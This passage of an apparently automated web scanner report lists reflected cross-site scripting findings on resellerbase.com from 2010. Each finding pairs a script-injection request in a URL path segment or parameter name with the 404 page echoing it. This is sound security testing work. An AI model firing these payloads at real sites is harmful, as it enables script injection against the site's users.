Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesdf5a7<script>alert(1)</script>5fe15bed67f/review/ was not found on this server.</p>
...[SNIP]...

2.5189. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d89<script>alert(1)</script>e0bd84e1494 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review26d89<script>alert(1)</script>e0bd84e1494/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review26d89<script>alert(1)</script>e0bd84e1494/ was not found on this server.</p>
...[SNIP]...

2.5190. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ef63<script>alert(1)</script>ab182286de2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/?6ef63<script>alert(1)</script>ab182286de2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/?6ef63<script>alert(1)</script>ab182286de2=1 was not found on this server.</p>
...[SNIP]...

2.5191. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11bfc<script>alert(1)</script>d01ba124da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service11bfc<script>alert(1)</script>d01ba124da/other/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service11bfc<script>alert(1)</script>d01ba124da/other/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5192. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f757a<script>alert(1)</script>d08fcf80278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherf757a<script>alert(1)</script>d08fcf80278/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherf757a<script>alert(1)</script>d08fcf80278/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5193. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb9f0<script>alert(1)</script>c603361b153 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesbb9f0<script>alert(1)</script>c603361b153/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesbb9f0<script>alert(1)</script>c603361b153/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5194. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2256e<script>alert(1)</script>6ef11a889f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos2256e<script>alert(1)</script>6ef11a889f2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos2256e<script>alert(1)</script>6ef11a889f2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5195. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32fe3<script>alert(1)</script>629ea761107 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images32fe3<script>alert(1)</script>629ea761107/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images32fe3<script>alert(1)</script>629ea761107/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5196. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 10ada<script>alert(1)</script>70b8265c9fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review10ada<script>alert(1)</script>70b8265c9fa/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review10ada<script>alert(1)</script>70b8265c9fa/0.gif was not found on this server.</p>
...[SNIP]...

2.5197. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 99636<script>alert(1)</script>7bd46c0be64 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/0.gif99636<script>alert(1)</script>7bd46c0be64 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/0.gif99636<script>alert(1)</script>7bd46c0be64 was not found on this server.</p>
...[SNIP]...

2.5198. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4e0cb<script>alert(1)</script>3c8eb3cb59c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/0.gif?4e0cb<script>alert(1)</script>3c8eb3cb59c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/0.gif?4e0cb<script>alert(1)</script>3c8eb3cb59c=1 was not found on this server.</p>
...[SNIP]...

2.5199. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5bc01<script>alert(1)</script>141cd4e779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5bc01<script>alert(1)</script>141cd4e779/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5bc01<script>alert(1)</script>141cd4e779/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5200. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c813a<script>alert(1)</script>5cdf7127579 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherc813a<script>alert(1)</script>5cdf7127579/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherc813a<script>alert(1)</script>5cdf7127579/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5201. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9b4a<script>alert(1)</script>65a0dd89dd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesb9b4a<script>alert(1)</script>65a0dd89dd4/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesb9b4a<script>alert(1)</script>65a0dd89dd4/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5202. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf979<script>alert(1)</script>b57adc0ed6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosbf979<script>alert(1)</script>b57adc0ed6c/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosbf979<script>alert(1)</script>b57adc0ed6c/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5203. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0fcb<script>alert(1)</script>2582b0d12dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesb0fcb<script>alert(1)</script>2582b0d12dd/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesb0fcb<script>alert(1)</script>2582b0d12dd/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5204. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e480d<script>alert(1)</script>a341029c99b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/reviewe480d<script>alert(1)</script>a341029c99b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/reviewe480d<script>alert(1)</script>a341029c99b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5205. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 689a4<script>alert(1)</script>b71a1159802 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/search.php689a4<script>alert(1)</script>b71a1159802?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php689a4<script>alert(1)</script>b71a1159802?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5206. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d75cc<a>13fb2ce8384 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd75cc<a>13fb2ce8384&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
